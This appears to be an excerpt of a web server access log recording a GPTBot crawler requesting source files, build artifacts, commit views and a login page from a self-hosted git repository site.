"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/.gitignore" +[17/Feb/2026:16:56:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/.gitignore?display=source" [Client 74.7.227.38] [Length 11000] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/.gitignore" +[17/Feb/2026:16:56:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10913] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/.gitignore" +[17/Feb/2026:16:56:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/.gitignore?display=source" [Client 74.7.227.38] [Length 12044] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/.gitignore" +[17/Feb/2026:16:56:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/.gitignore?display=source" [Client 74.7.227.38] [Length 12043] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/.gitignore" +[17/Feb/2026:16:56:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/.gitignore?display=source" [Client 74.7.227.38] [Length 10999] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/.gitignore" +[17/Feb/2026:16:56:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode/c_cpp_properties.json?display=rendered" [Client 74.7.227.38] [Length 10970] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode/c_cpp_properties.json" +[17/Feb/2026:16:56:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode/c_cpp_properties.json?display=rendered" [Client 74.7.227.38] [Length 10971] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode/c_cpp_properties.json" +[17/Feb/2026:16:56:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode/c_cpp_properties.json?display=rendered" [Client 74.7.227.38] [Length 10939] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode/c_cpp_properties.json" +[17/Feb/2026:16:56:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/PostgresWatchdog.spec?display=rendered" [Client 74.7.227.38] [Length 10940] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:16:56:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/PostgresWatchdog.spec?display=rendered" [Client 74.7.227.38] [Length 10925] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:16:57:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/PostgresWatchdog.spec?display=rendered" [Client 74.7.227.38] [Length 10941] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:16:57:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/PostgresWatchdog.spec?display=rendered" [Client 74.7.227.38] [Length 10941] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:16:57:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.1%2fAnalysis-00.toc" [Client 74.7.227.38] [Length 23952] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" +[17/Feb/2026:16:57:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fGoldMonitor%2fAnalysis-00.toc" [Client 74.7.227.38] [Length 20992] [Gzip 3.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/Analysis-00.toc" +[17/Feb/2026:16:57:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fAssetPilot%2fAnalysis-00.toc" [Client 74.7.227.38] [Length 20962] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/Analysis-00.toc" +[17/Feb/2026:16:57:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.2%2fAnalysis-00.toc" [Client 74.7.227.38] [Length 23954] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" +[17/Feb/2026:16:57:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.3%2fAnalysis-00.toc" [Client 74.7.227.38] [Length 23969] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" +[17/Feb/2026:16:57:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 11016] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:57:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 11015] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:57:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 11014] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:57:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/README.md?display=source" [Client 74.7.227.38] [Length 11765] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/README.md" +[17/Feb/2026:16:57:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/projects?q=&sort=oldest&state=open" [Client 74.7.227.38] [Length 7809] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/projects" +[17/Feb/2026:16:57:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?q=&sort=name&state=open" [Client 74.7.227.38] [Length 8493] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones" +[17/Feb/2026:16:57:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a?files=html%2fpages%2fDCS.html" [Client 74.7.227.38] [Length 30638] [Gzip 8.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages/DCS.html" +[17/Feb/2026:16:57:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 11220] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:57:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:16:57:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 11219] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:57:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/tsconfig.json?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/tsconfig.json" +[17/Feb/2026:16:57:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 9969] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:16:57:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 9970] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:16:57:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 9968] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:16:57:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 72042] [Gzip 33.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:16:57:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 72043] [Gzip 33.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:16:57:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 72040] [Gzip 33.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:16:57:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 28704] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:16:57:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:57:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 10172] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:57:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11236] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:57:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 10173] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:57:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:57:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 28704] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:16:57:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 28704] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:16:57:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 91] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:57:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 91] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:57:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/tsconfig.json?display=rendered" [Client 74.7.227.38] [Length 10914] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/tsconfig.json" +[17/Feb/2026:16:57:23 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/components/%7Bitem.href%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/branch/main/html/components/Header.tsx" +[17/Feb/2026:16:57:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/index.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/index.html" +[17/Feb/2026:16:57:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/index.html" +[17/Feb/2026:16:57:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/labels?sort=alphabetically&state=" [Client 74.7.227.38] [Length 7631] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/labels" +[17/Feb/2026:16:57:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip?display=source" [Client 74.7.227.38] [Length 11565] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 